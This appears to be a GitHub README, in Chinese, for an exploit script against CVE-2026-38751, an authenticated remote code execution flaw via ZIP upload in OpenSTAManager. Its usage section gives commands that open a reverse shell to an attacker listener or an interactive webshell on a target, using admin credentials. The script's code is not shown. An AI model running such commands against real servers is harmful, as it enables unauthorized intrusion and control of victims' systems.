Why-Shell/CVE-2026-38751

GitHub: Why-Shell/CVE-2026-38751

针对 OpenSTAManager 模块上传漏洞(CVE-2026-38751)的利用脚本,通过未经验证的 ZIP 上传实现远程代码执行。

Stars: 0 | Forks: 0

# CVE-2026-38751 — OpenSTAManager 模块上传 RCE 通过模块更新端点中未经验证的 ZIP 上传实现经过身份验证的 RCE。 **受影响版本:** OpenSTAManager <= 2.10.x ## 环境要求 pip install requests ## 用法 ``` # 反弹 shell(Penelope 或任何 listener) python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444 # 交互式 webshell python3 exploit.py -u http://TARGET -U admin -P admin --interactive ``` ## 参考资料 - NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-38751 ## 免责声明 仅供授权的渗透测试和教育目的使用。
标签:CISA项目, Python, RCE, 威胁模拟, 无后门, 逆向工具